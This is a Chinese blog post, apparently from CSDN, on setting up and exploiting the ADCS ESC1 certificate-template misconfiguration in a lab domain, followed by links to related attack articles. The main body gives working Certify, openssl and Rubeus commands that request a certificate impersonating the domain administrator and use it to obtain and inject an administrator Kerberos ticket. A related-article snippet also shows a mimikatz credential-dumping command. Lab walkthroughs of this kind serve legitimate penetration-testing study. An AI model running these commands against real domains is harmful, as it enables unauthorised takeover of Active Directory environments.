ADCS-ESC1漏洞环境构造与利用

最新推荐文章于 2025-04-01 15:16:07 发布
最新推荐文章于 2025-04-01 15:16:07 发布
阅读量1.4k 收藏 6
点赞数 26
文章标签: 安全 域安全 ADCS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44001905/article/details/145833252
版权

原理

ESC1是ADCS中的一个漏洞,利用该漏洞可实现权限提升攻击。在 ESC1 漏洞利用中,攻击者通过一系列操作获取包含域管身份信息的证书后,利用 Rubeus.exe 工具,使用该证书获取 TGT 票据。一旦成功获取 TGT 票据,攻击者就可以利用该票据进行权限提升,访问原本只有域管理员才能访问的域控资源等,从而实现对域环境的进一步控制。

漏洞利用条件

证书注册权限:Domain Users 组具备获取证书的权限。

应用程序策略:证书具备身份验证功能,例如登记为客户端身份验证,只要证书存在用于验证的相关功能,即可满足该攻击条件。

关键标志开启:开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志,此标志允许通过_CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_声明自身身份,从而实现伪装成域管理员的目的,这是 ESC1 攻击得以实施的关键步骤。

漏洞环境构造

配置证书模板

在ADCS服务器中运行中输入certtmpl.msc打开证书模板控制台,右键复制工作站身份验证

常规

模板名称设置为ESC1(可任意填写)

使用者名称

选择在请求中提供,开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

拓展

选择应用程序策略,添加客户端身份验证

安全

加入Domain Users具有注册权限

发布证书模板

打开certsrv.msc

在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC1确定添加

漏洞环境检测

使用Certify检测有没有证书配置错误

Certify.exe find /vulnerable

当出现以下情况时,满足 ESC1 漏洞条件,即存在 ESC1 漏洞:

  1. msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT
  2. pkiextendedkeyusage:客户端身份验证
  3. Enrollment Rights:Domain Users 组可获取证书

满足上述条件,可利用证书漏洞伪装成域管理员获取更高权限。

漏洞利用

在普通域用户下,使用Certify.exe以administrator身份申请ESC1证书

Certify.exe request /ca:adcs.lutra.com\lutra-ADCS-CA /template:ESC1 /altname:administrator

将申请的证书复制保存为cert.pem,使用openssl转为cert.pfx,密码为空即可

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

使用Rubeus请求域管administrator的TGT

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.110.127 /ptt

在执行的时候出现报错,KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

原因是没有将域控制器身份验证证书导入到域控中

将域控制器身份验证注册后再次执行,成功导入票据

导入票据后,已经有权限访问域控目录

Iam0x17
关注
内网渗透(八十五)之ADCS证书服务攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-28 1278
2021年6月17日,国外安全研究员 Will Schroeder 和 Lee Christensen 共同发布了针对ADCS(Active Directory Certificate Service, 活动目录证书服务)的攻击手法。同年8月5日,在Black Hat 2021上 Will Schroeder 和 Lee CHristensen 对该攻击手法进行了详细讲解。至此,ADCS攻击第一次进入人们的视野。
深入分析CVE-2022-26923 ADCS权限提升漏洞
谢公子的博客
05-26 3260
目录 漏洞背景和描述 基础知识 ADCS服务搭建&LDAPS配置 PKI公钥基础设施 CA证书颁发机构 PKINIT Kerberos认证 证书模板 用户模板 计算机模板 证书注册 漏洞原理 用户模板 实验一 实验二 实验三 实验四 实验五 实验六 实验七 原理总结 计算机模板 实验一 实验二 实验三 实验四 实验五 原理总结 漏洞复现 定位证书服务器 外 创建机器用户 请求证书 认证获得控hash 导出内任意用户哈希
终于有人把渗透之ADCS证书攻击讲透了
weixin_65550121的博客
12-09 2379
PKI是一个术语,有些地方会采用中文的表述——公钥基本结构,用来实现证书的产生、管理、存储、分发和撤销等功能。我们可以把他理解成是一套解决方案,这套解决方案里面需要有证书颁发机构,有证书发布,证书撤掉等功能。
ADCS-ESC3漏洞环境构造利用,从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
04-01 669
ESC3漏洞就像一个定时炸弹,一旦配置不当,就会给黑客留下可乘之机。所以,一定要重视证书颁发过程中的配置安全,避免出现任何疏漏。修复建议:严格控制证书模板的注册权限,不要随意开放给Authenticated Users。禁止不必要的证书申请代理策略,避免被恶意利用。确保CA服务器的配置安全,定期检查并更新。及时修补ADCS服务相关漏洞,亡羊补牢,为时未晚。记住,安全不是一句口号,而是需要我们时刻警惕,并付诸行动的责任!黑客/网络安全学习包资料目录成长路线图&学习规划配套视频教程。
渗透测试 | 详解ADCS证书服务攻击手法
MachineGunJoe666
06-13 846
漏洞产生的主要原因是ADCS服务器在处理计算机模板证书时是通过机器的dNSHostName属性来辨别用户的,而普通用户即有权限修改它所创建的机器账户dNSHostName属性,因此恶意攻击者可以创建一个机器账户,然后修改它的dNSHostName属性为控的dNSHostName,然后去请求计算机模板的证书。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。在这种层次结构下,根CA给子从属CA颁发的证书认证,子从属CA给下面的应用颁发和管理证书,根CA不直接给应用颁发证书。
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 2416
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
红队专题-内网横向-工作组Workgroup Domain Active Directory渗透
aming小老弟
12-21 1719
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得管理员权限,即可控制内所有用户和主机,因此活动目录环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
ADCS-ESC3漏洞环境构造利用
信息安全
02-25 637
但当存在两个特定配置的证书模板时,低权限用户利用第一个模板(需有权限注册证书且应用策略开启“证书申请代理”等)申请包含证书请求代理EKU的证书,然后使用此证书,借助第二个模板(需有权限注册证书、定义启用认证的EKU等)代表高权限用户申请证书。若CA配置存在漏洞,未严格验证就颁发证书,攻击者就能获取高权限证书,进而通过获取TGT票据提升权限,访问内高权限资源。在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC2确定添加。选择应用程序策略,将策略设置为证书申请代理。
CVE-2022-26923 ADCS权限提升漏洞
总有人间一两风,填我十万八千梦
05-22 5086
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的权限提升漏洞
ADCS攻击之CVE-2022–26923
Adminxe的博客
03-06 661
漏洞允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中将权限提升到管理员。在默认安装的ADCS里就启用了Machine模板。
红队|渗透重要漏洞总结
渗透测试研究中心
11-24 1475
1.MS14-068kerberos认证,no PAC用户在向 Kerberos 密钥分发中心(KDC)申请TGT(由票据授权服务产生的身份凭证)时,可以伪造自己的 Kerberos 票据漏洞效果:将任意用户提升到管权限利用条件:1.小于2012R2的控 没有打MS14-068的补丁(KB3011780)2.拿下一台加入的计算机3.有这台内计算机的用户密码和Sid利用方式:在《Ker...
ADCS攻击之证书模板配置错误 ESC1
Adminxe的博客
03-05 1176
表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书。表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证。表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括管理员用户。注:将生成的cert.pem先保存到txt,然后重命名为cert.pem。pem转换pfx证书,直接回车,不需要输入密码,申请TGT票据。右键复制工作站身份认证模板,做一些修改。认证后的用户/用户随便勾一个就行了。
ADCS-CVE-2022-26923内提权漏洞-
问题很多的小明
07-10 478
本文复现了ADCS漏洞CVE-2022-26923
CVE-2020-1472内提权漏洞复现
whojoe的博客
07-08 947
CVE-2020-1472内提权漏洞复现环境漏洞复现mimikatz查看原本hashpoc重置密码获取密码恢复密码查看恢复的密码python重置密码获取管密码1获取控机器密码1获取控机器密码2恢复控密码查看恢复的密码参考文章 环境 ad 192.168.164.129 user 192.168.164.133 kali 192.168.164.x 漏洞复现 mimikatz 查看原本hash mimikatz.exe "privilege::debug" "sekurlsa::logonpassw
PetitPotam漏洞复现(ESC8)结合CVE-2019-1040
whojoe的博客
08-02 3703
PetitPotam漏洞复现环境搭建漏洞复现参考文章 环境搭建 主机 机器名 ip 用户 密码 版本 1 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 控2 ad2.test.com 192.168.164.146 administrator Aa1234 win2012r2 内机器 user.test.com 192.168.164.129 user1 Uu1234. win2008r2 kali
AD CS证书服务中继攻击
网络安全。
03-05 3970
0x1 简介 AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。 注:借图 0x2 环境信息 控(windows server 2016):192.168.3.129 辅控(windows server 2016):192.168.3.131(AD CS) 内主机(windows 10):192.168.3.171 攻击机(kali):192.168.3.158 搭建ADCS证书服务:https://mp.
ADCS证书服务攻击
谢公子的博客
08-06 4583
ADCS支持几种基于HTTP的通过管理员可以安装的其他AD CS服务器角色功能。这些基于http的证书注册接口都是易受攻击的NTLM中继攻击,因为没有启用NTLM中继保护,而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此更安全的协议(如 Kerberos)无法使用。 http://10.211.55.4/certsrv/certfnsh.asp 漏洞复现 定位证书服务器机器 certutil -config - -ping ntlmrela
ADCS攻击利用
slash_HK的博客
12-23 4913
一万字呕心沥血,全站最详细ADCS攻击利用方法及细节复现,包括服务器配置等,细节满满,支持走一波,也欢迎各位师傅斧正。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值